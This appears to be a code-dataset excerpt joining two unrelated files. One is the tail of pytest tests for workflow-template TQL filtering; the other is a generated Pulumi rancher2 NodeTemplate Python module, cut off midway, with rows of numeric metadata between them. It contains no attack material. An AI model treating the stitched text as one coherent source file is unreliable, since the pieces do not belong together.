assert workflow_template.description == workflow_template_data.get('description')
assert workflow_template.name == workflow_template_data.get('name')
assert workflow_template.version == workflow_template_data.get('version')
assert workflow_template.cases
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_by_tql_filter_active(self, request):
"""Test Workflow Template Get by TQL"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# retrieve workflow event using TQL
workflow_templates = self.cm.workflow_templates()
workflow_templates.filter.active(TQL.Operator.EQ, False)
# workflow_templates.filter.id(TQL.Operator.EQ, workflow_template.id)
for wt in workflow_templates:
# more than one workflow event will always be returned
if wt.name == workflow_template_data.get('name'):
break
else:
assert False, 'No workflow templates returned for TQL'
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_by_tql_filter_description(self, request):
"""Test Workflow Template Get by TQL"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# retrieve workflow event using TQL
workflow_templates = self.cm.workflow_templates()
workflow_templates.filter.description(
TQL.Operator.EQ, workflow_template_data.get('description')
)
for wt in workflow_templates:
# more than one workflow event will always be returned
if wt.name == workflow_template_data.get('name'):
break
else:
assert False, 'No workflow templates returned for TQL'
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_by_tql_filter_id(self, request):
"""Test Workflow Template Get by TQL"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# retrieve workflow event using TQL
workflow_templates = self.cm.workflow_templates()
workflow_templates.filter.id(TQL.Operator.EQ, workflow_template.id)
for wt in workflow_templates:
# more than one workflow event will always be returned
if wt.name == workflow_template_data.get('name'):
break
else:
assert False, 'No workflow templates returned for TQL'
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_by_tql_filter_name(self, request):
"""Test Workflow Template Get by TQL"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# retrieve workflow event using TQL
workflow_templates = self.cm.workflow_templates()
workflow_templates.filter.name(TQL.Operator.EQ, workflow_template.name)
for wt in workflow_templates:
# more than one workflow event will always be returned
if wt.name == workflow_template_data.get('name'):
break
else:
assert False, 'No workflow templates returned for TQL'
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_get_by_tql_filter_version(self, request):
"""Test Workflow Template Get by TQL"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
workflow_template.submit()
# retrieve workflow event using TQL
workflow_templates = self.cm.workflow_templates()
workflow_templates.filter.id(TQL.Operator.EQ, workflow_template.id)
workflow_templates.filter.version(TQL.Operator.EQ, workflow_template_data.get('version'))
for wt in workflow_templates:
# more than one workflow event will always be returned
if wt.name == workflow_template_data.get('name'):
break
else:
assert False, 'No workflow templates returned for TQL'
# cleanup workflow template
workflow_template.delete()
def test_workflow_template_as_entity(self, request):
"""Test Workflow Template As entity"""
# workflow template data
workflow_template_data = {
'description': f'a description for {request.node.name}',
'name': request.node.name,
'version': 1,
}
# create workflow_template
workflow_template = self.cm.workflow_template(**workflow_template_data)
# assert a proper entity is returned
assert workflow_template.as_entity.get('value') == workflow_template_data.get('name')
| 37.967638
| 98
| 0.6582
| 1,298
| 11,732
| 5.715716
| 0.09322
| 0.377409
| 0.142876
| 0.129397
| 0.858741
| 0.836636
| 0.80806
| 0.798356
| 0.778272
| 0.769106
| 0
| 0.001148
| 0.257586
| 11,732
| 308
| 99
| 38.090909
| 0.850631
| 0.191868
| 0
| 0.674157
| 0
| 0
| 0.111385
| 0.003863
| 0
| 0
| 0
| 0
| 0.129213
| 1
| 0.095506
| false
| 0
| 0.016854
| 0
| 0.117978
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c381b953e603199ab5b3cb1f239fe6a3237f2a9d
| 72,015
|
py
|
Python
|
sdk/python/pulumi_rancher2/node_template.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2020-03-23T15:59:11.000Z
|
2021-01-29T00:37:32.000Z
|
sdk/python/pulumi_rancher2/node_template.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 76
|
2020-01-16T20:00:25.000Z
|
2022-03-31T20:30:08.000Z
|
sdk/python/pulumi_rancher2/node_template.py
|
pulumi/pulumi-rancher2
|
7a98af8cf598b711084a7f46c0fe71b43ed7a8ac
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2020-03-27T17:39:59.000Z
|
2020-11-24T23:09:24.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['NodeTemplateArgs', 'NodeTemplate']
@pulumi.input_type
class NodeTemplateArgs:
def __init__(__self__, *,
amazonec2_config: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]] = None,
opennebula_config: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']] = None,
openstack_config: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']] = None):
"""
The set of arguments for constructing a NodeTemplate resource.
:param pulumi.Input['NodeTemplateAmazonec2ConfigArgs'] amazonec2_config: AWS config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
:param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
:param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
:param pulumi.Input['NodeTemplateAzureConfigArgs'] azure_config: Azure config for the Node Template (list maxitems:1)
:param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
:param pulumi.Input[str] description: Description for the Node Template (string)
:param pulumi.Input['NodeTemplateDigitaloceanConfigArgs'] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
:param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
:param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
:param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
:param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
:param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
:param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
:param pulumi.Input['NodeTemplateHetznerConfigArgs'] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
:param pulumi.Input['NodeTemplateLinodeConfigArgs'] linode_config: Linode config for the Node Template (list maxitems:1)
:param pulumi.Input[str] name: The name of the Node Template (string)
:param pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
:param pulumi.Input['NodeTemplateOpennebulaConfigArgs'] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
:param pulumi.Input['NodeTemplateOpenstackConfigArgs'] openstack_config: Openstack config for the Node Template (list maxitems:1)
:param pulumi.Input[bool] use_internal_ip_address: Engine storage driver for the node template (bool)
:param pulumi.Input['NodeTemplateVsphereConfigArgs'] vsphere_config: vSphere config for the Node Template (list maxitems:1)
"""
if amazonec2_config is not None:
pulumi.set(__self__, "amazonec2_config", amazonec2_config)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if auth_certificate_authority is not None:
pulumi.set(__self__, "auth_certificate_authority", auth_certificate_authority)
if auth_key is not None:
pulumi.set(__self__, "auth_key", auth_key)
if azure_config is not None:
pulumi.set(__self__, "azure_config", azure_config)
if cloud_credential_id is not None:
pulumi.set(__self__, "cloud_credential_id", cloud_credential_id)
if description is not None:
pulumi.set(__self__, "description", description)
if digitalocean_config is not None:
pulumi.set(__self__, "digitalocean_config", digitalocean_config)
if driver_id is not None:
pulumi.set(__self__, "driver_id", driver_id)
if engine_env is not None:
pulumi.set(__self__, "engine_env", engine_env)
if engine_insecure_registries is not None:
pulumi.set(__self__, "engine_insecure_registries", engine_insecure_registries)
if engine_install_url is not None:
pulumi.set(__self__, "engine_install_url", engine_install_url)
if engine_label is not None:
pulumi.set(__self__, "engine_label", engine_label)
if engine_opt is not None:
pulumi.set(__self__, "engine_opt", engine_opt)
if engine_registry_mirrors is not None:
pulumi.set(__self__, "engine_registry_mirrors", engine_registry_mirrors)
if engine_storage_driver is not None:
pulumi.set(__self__, "engine_storage_driver", engine_storage_driver)
if hetzner_config is not None:
pulumi.set(__self__, "hetzner_config", hetzner_config)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if linode_config is not None:
pulumi.set(__self__, "linode_config", linode_config)
if name is not None:
pulumi.set(__self__, "name", name)
if node_taints is not None:
pulumi.set(__self__, "node_taints", node_taints)
if opennebula_config is not None:
pulumi.set(__self__, "opennebula_config", opennebula_config)
if openstack_config is not None:
pulumi.set(__self__, "openstack_config", openstack_config)
if use_internal_ip_address is not None:
pulumi.set(__self__, "use_internal_ip_address", use_internal_ip_address)
if vsphere_config is not None:
pulumi.set(__self__, "vsphere_config", vsphere_config)
@property
@pulumi.getter(name="amazonec2Config")
def amazonec2_config(self) -> Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]:
"""
AWS config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "amazonec2_config")
@amazonec2_config.setter
def amazonec2_config(self, value: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]):
pulumi.set(self, "amazonec2_config", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Annotations for Node Template object (map)
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authCertificateAuthority")
def auth_certificate_authority(self) -> Optional[pulumi.Input[str]]:
"""
Auth certificate authority for the Node Template (string)
"""
return pulumi.get(self, "auth_certificate_authority")
@auth_certificate_authority.setter
def auth_certificate_authority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auth_certificate_authority", value)
@property
@pulumi.getter(name="authKey")
def auth_key(self) -> Optional[pulumi.Input[str]]:
"""
Auth key for the Node Template (string)
"""
return pulumi.get(self, "auth_key")
@auth_key.setter
def auth_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auth_key", value)
@property
@pulumi.getter(name="azureConfig")
def azure_config(self) -> Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]:
"""
Azure config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "azure_config")
@azure_config.setter
def azure_config(self, value: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]):
pulumi.set(self, "azure_config", value)
@property
@pulumi.getter(name="cloudCredentialId")
def cloud_credential_id(self) -> Optional[pulumi.Input[str]]:
"""
Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
"""
return pulumi.get(self, "cloud_credential_id")
@cloud_credential_id.setter
def cloud_credential_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cloud_credential_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description for the Node Template (string)
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="digitaloceanConfig")
def digitalocean_config(self) -> Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]:
"""
Digitalocean config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "digitalocean_config")
@digitalocean_config.setter
def digitalocean_config(self, value: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]):
pulumi.set(self, "digitalocean_config", value)
@property
@pulumi.getter(name="driverId")
def driver_id(self) -> Optional[pulumi.Input[str]]:
"""
The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
"""
return pulumi.get(self, "driver_id")
@driver_id.setter
def driver_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_id", value)
@property
@pulumi.getter(name="engineEnv")
def engine_env(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Engine environment for the node template (string)
"""
return pulumi.get(self, "engine_env")
@engine_env.setter
def engine_env(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "engine_env", value)
@property
@pulumi.getter(name="engineInsecureRegistries")
def engine_insecure_registries(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Insecure registry for the node template (list)
"""
return pulumi.get(self, "engine_insecure_registries")
@engine_insecure_registries.setter
def engine_insecure_registries(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "engine_insecure_registries", value)
@property
@pulumi.getter(name="engineInstallUrl")
def engine_install_url(self) -> Optional[pulumi.Input[str]]:
"""
Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
"""
return pulumi.get(self, "engine_install_url")
@engine_install_url.setter
def engine_install_url(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_install_url", value)
@property
@pulumi.getter(name="engineLabel")
def engine_label(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Engine label for the node template (string)
"""
return pulumi.get(self, "engine_label")
@engine_label.setter
def engine_label(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "engine_label", value)
@property
@pulumi.getter(name="engineOpt")
def engine_opt(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Engine options for the node template (map)
"""
return pulumi.get(self, "engine_opt")
@engine_opt.setter
def engine_opt(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "engine_opt", value)
@property
@pulumi.getter(name="engineRegistryMirrors")
def engine_registry_mirrors(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Engine registry mirror for the node template (list)
"""
return pulumi.get(self, "engine_registry_mirrors")
@engine_registry_mirrors.setter
def engine_registry_mirrors(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "engine_registry_mirrors", value)
@property
@pulumi.getter(name="engineStorageDriver")
def engine_storage_driver(self) -> Optional[pulumi.Input[str]]:
"""
Engine storage driver for the node template (string)
"""
return pulumi.get(self, "engine_storage_driver")
@engine_storage_driver.setter
def engine_storage_driver(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "engine_storage_driver", value)
@property
@pulumi.getter(name="hetznerConfig")
def hetzner_config(self) -> Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]:
"""
Hetzner config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "hetzner_config")
@hetzner_config.setter
def hetzner_config(self, value: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']]):
pulumi.set(self, "hetzner_config", value)
@property
@pulumi.getter
def labels(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Labels for Node Template object (map)
"""
return pulumi.get(self, "labels")
@labels.setter
def labels(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "labels", value)
@property
@pulumi.getter(name="linodeConfig")
def linode_config(self) -> Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]:
"""
Linode config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "linode_config")
@linode_config.setter
def linode_config(self, value: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']]):
pulumi.set(self, "linode_config", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Node Template (string)
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nodeTaints")
def node_taints(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]:
"""
Node taints. For Rancher v2.3.3 or above (List)
"""
return pulumi.get(self, "node_taints")
@node_taints.setter
def node_taints(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]]):
pulumi.set(self, "node_taints", value)
@property
@pulumi.getter(name="opennebulaConfig")
def opennebula_config(self) -> Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]:
"""
Opennebula config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "opennebula_config")
@opennebula_config.setter
def opennebula_config(self, value: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']]):
pulumi.set(self, "opennebula_config", value)
@property
@pulumi.getter(name="openstackConfig")
def openstack_config(self) -> Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]:
"""
Openstack config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "openstack_config")
@openstack_config.setter
def openstack_config(self, value: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']]):
pulumi.set(self, "openstack_config", value)
@property
@pulumi.getter(name="useInternalIpAddress")
def use_internal_ip_address(self) -> Optional[pulumi.Input[bool]]:
"""
Engine storage driver for the node template (bool)
"""
return pulumi.get(self, "use_internal_ip_address")
@use_internal_ip_address.setter
def use_internal_ip_address(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "use_internal_ip_address", value)
@property
@pulumi.getter(name="vsphereConfig")
def vsphere_config(self) -> Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]:
"""
vSphere config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "vsphere_config")
@vsphere_config.setter
def vsphere_config(self, value: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']]):
pulumi.set(self, "vsphere_config", value)
@pulumi.input_type
class _NodeTemplateState:
def __init__(__self__, *,
amazonec2_config: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']] = None,
annotations: Optional[pulumi.Input[Mapping[str, Any]]] = None,
auth_certificate_authority: Optional[pulumi.Input[str]] = None,
auth_key: Optional[pulumi.Input[str]] = None,
azure_config: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']] = None,
cloud_credential_id: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
digitalocean_config: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']] = None,
driver: Optional[pulumi.Input[str]] = None,
driver_id: Optional[pulumi.Input[str]] = None,
engine_env: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_insecure_registries: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_install_url: Optional[pulumi.Input[str]] = None,
engine_label: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_opt: Optional[pulumi.Input[Mapping[str, Any]]] = None,
engine_registry_mirrors: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
engine_storage_driver: Optional[pulumi.Input[str]] = None,
hetzner_config: Optional[pulumi.Input['NodeTemplateHetznerConfigArgs']] = None,
labels: Optional[pulumi.Input[Mapping[str, Any]]] = None,
linode_config: Optional[pulumi.Input['NodeTemplateLinodeConfigArgs']] = None,
name: Optional[pulumi.Input[str]] = None,
node_taints: Optional[pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]]] = None,
opennebula_config: Optional[pulumi.Input['NodeTemplateOpennebulaConfigArgs']] = None,
openstack_config: Optional[pulumi.Input['NodeTemplateOpenstackConfigArgs']] = None,
use_internal_ip_address: Optional[pulumi.Input[bool]] = None,
vsphere_config: Optional[pulumi.Input['NodeTemplateVsphereConfigArgs']] = None):
"""
Input properties used for looking up and filtering NodeTemplate resources.
:param pulumi.Input['NodeTemplateAmazonec2ConfigArgs'] amazonec2_config: AWS config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] annotations: Annotations for Node Template object (map)
:param pulumi.Input[str] auth_certificate_authority: Auth certificate authority for the Node Template (string)
:param pulumi.Input[str] auth_key: Auth key for the Node Template (string)
:param pulumi.Input['NodeTemplateAzureConfigArgs'] azure_config: Azure config for the Node Template (list maxitems:1)
:param pulumi.Input[str] cloud_credential_id: Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
:param pulumi.Input[str] description: Description for the Node Template (string)
:param pulumi.Input['NodeTemplateDigitaloceanConfigArgs'] digitalocean_config: Digitalocean config for the Node Template (list maxitems:1)
:param pulumi.Input[str] driver: (Computed) The driver of the node template (string)
:param pulumi.Input[str] driver_id: The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
:param pulumi.Input[Mapping[str, Any]] engine_env: Engine environment for the node template (string)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_insecure_registries: Insecure registry for the node template (list)
:param pulumi.Input[str] engine_install_url: Docker engine install URL for the node template. Available install docker versions at `https://github.com/rancher/install-docker` (string)
:param pulumi.Input[Mapping[str, Any]] engine_label: Engine label for the node template (string)
:param pulumi.Input[Mapping[str, Any]] engine_opt: Engine options for the node template (map)
:param pulumi.Input[Sequence[pulumi.Input[str]]] engine_registry_mirrors: Engine registry mirror for the node template (list)
:param pulumi.Input[str] engine_storage_driver: Engine storage driver for the node template (string)
:param pulumi.Input['NodeTemplateHetznerConfigArgs'] hetzner_config: Hetzner config for the Node Template (list maxitems:1)
:param pulumi.Input[Mapping[str, Any]] labels: Labels for Node Template object (map)
:param pulumi.Input['NodeTemplateLinodeConfigArgs'] linode_config: Linode config for the Node Template (list maxitems:1)
:param pulumi.Input[str] name: The name of the Node Template (string)
:param pulumi.Input[Sequence[pulumi.Input['NodeTemplateNodeTaintArgs']]] node_taints: Node taints. For Rancher v2.3.3 or above (List)
:param pulumi.Input['NodeTemplateOpennebulaConfigArgs'] opennebula_config: Opennebula config for the Node Template (list maxitems:1)
:param pulumi.Input['NodeTemplateOpenstackConfigArgs'] openstack_config: Openstack config for the Node Template (list maxitems:1)
:param pulumi.Input[bool] use_internal_ip_address: Engine storage driver for the node template (bool)
:param pulumi.Input['NodeTemplateVsphereConfigArgs'] vsphere_config: vSphere config for the Node Template (list maxitems:1)
"""
if amazonec2_config is not None:
pulumi.set(__self__, "amazonec2_config", amazonec2_config)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if auth_certificate_authority is not None:
pulumi.set(__self__, "auth_certificate_authority", auth_certificate_authority)
if auth_key is not None:
pulumi.set(__self__, "auth_key", auth_key)
if azure_config is not None:
pulumi.set(__self__, "azure_config", azure_config)
if cloud_credential_id is not None:
pulumi.set(__self__, "cloud_credential_id", cloud_credential_id)
if description is not None:
pulumi.set(__self__, "description", description)
if digitalocean_config is not None:
pulumi.set(__self__, "digitalocean_config", digitalocean_config)
if driver is not None:
pulumi.set(__self__, "driver", driver)
if driver_id is not None:
pulumi.set(__self__, "driver_id", driver_id)
if engine_env is not None:
pulumi.set(__self__, "engine_env", engine_env)
if engine_insecure_registries is not None:
pulumi.set(__self__, "engine_insecure_registries", engine_insecure_registries)
if engine_install_url is not None:
pulumi.set(__self__, "engine_install_url", engine_install_url)
if engine_label is not None:
pulumi.set(__self__, "engine_label", engine_label)
if engine_opt is not None:
pulumi.set(__self__, "engine_opt", engine_opt)
if engine_registry_mirrors is not None:
pulumi.set(__self__, "engine_registry_mirrors", engine_registry_mirrors)
if engine_storage_driver is not None:
pulumi.set(__self__, "engine_storage_driver", engine_storage_driver)
if hetzner_config is not None:
pulumi.set(__self__, "hetzner_config", hetzner_config)
if labels is not None:
pulumi.set(__self__, "labels", labels)
if linode_config is not None:
pulumi.set(__self__, "linode_config", linode_config)
if name is not None:
pulumi.set(__self__, "name", name)
if node_taints is not None:
pulumi.set(__self__, "node_taints", node_taints)
if opennebula_config is not None:
pulumi.set(__self__, "opennebula_config", opennebula_config)
if openstack_config is not None:
pulumi.set(__self__, "openstack_config", openstack_config)
if use_internal_ip_address is not None:
pulumi.set(__self__, "use_internal_ip_address", use_internal_ip_address)
if vsphere_config is not None:
pulumi.set(__self__, "vsphere_config", vsphere_config)
@property
@pulumi.getter(name="amazonec2Config")
def amazonec2_config(self) -> Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]:
"""
AWS config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "amazonec2_config")
@amazonec2_config.setter
def amazonec2_config(self, value: Optional[pulumi.Input['NodeTemplateAmazonec2ConfigArgs']]):
pulumi.set(self, "amazonec2_config", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Annotations for Node Template object (map)
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authCertificateAuthority")
def auth_certificate_authority(self) -> Optional[pulumi.Input[str]]:
"""
Auth certificate authority for the Node Template (string)
"""
return pulumi.get(self, "auth_certificate_authority")
@auth_certificate_authority.setter
def auth_certificate_authority(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auth_certificate_authority", value)
@property
@pulumi.getter(name="authKey")
def auth_key(self) -> Optional[pulumi.Input[str]]:
"""
Auth key for the Node Template (string)
"""
return pulumi.get(self, "auth_key")
@auth_key.setter
def auth_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "auth_key", value)
@property
@pulumi.getter(name="azureConfig")
def azure_config(self) -> Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]:
"""
Azure config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "azure_config")
@azure_config.setter
def azure_config(self, value: Optional[pulumi.Input['NodeTemplateAzureConfigArgs']]):
pulumi.set(self, "azure_config", value)
@property
@pulumi.getter(name="cloudCredentialId")
def cloud_credential_id(self) -> Optional[pulumi.Input[str]]:
"""
Cloud credential ID for the Node Template. Required from Rancher v2.2.x (string)
"""
return pulumi.get(self, "cloud_credential_id")
@cloud_credential_id.setter
def cloud_credential_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cloud_credential_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description for the Node Template (string)
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="digitaloceanConfig")
def digitalocean_config(self) -> Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]:
"""
Digitalocean config for the Node Template (list maxitems:1)
"""
return pulumi.get(self, "digitalocean_config")
@digitalocean_config.setter
def digitalocean_config(self, value: Optional[pulumi.Input['NodeTemplateDigitaloceanConfigArgs']]):
pulumi.set(self, "digitalocean_config", value)
@property
@pulumi.getter
def driver(self) -> Optional[pulumi.Input[str]]:
"""
(Computed) The driver of the node template (string)
"""
return pulumi.get(self, "driver")
@driver.setter
def driver(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver", value)
@property
@pulumi.getter(name="driverId")
def driver_id(self) -> Optional[pulumi.Input[str]]:
"""
The node driver id used by the node template. It's required if the node driver isn't built in Rancher (string)
"""
return pulumi.get(self, "driver_id")
@driver_id.setter
def driver_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "driver_id", value)
@property
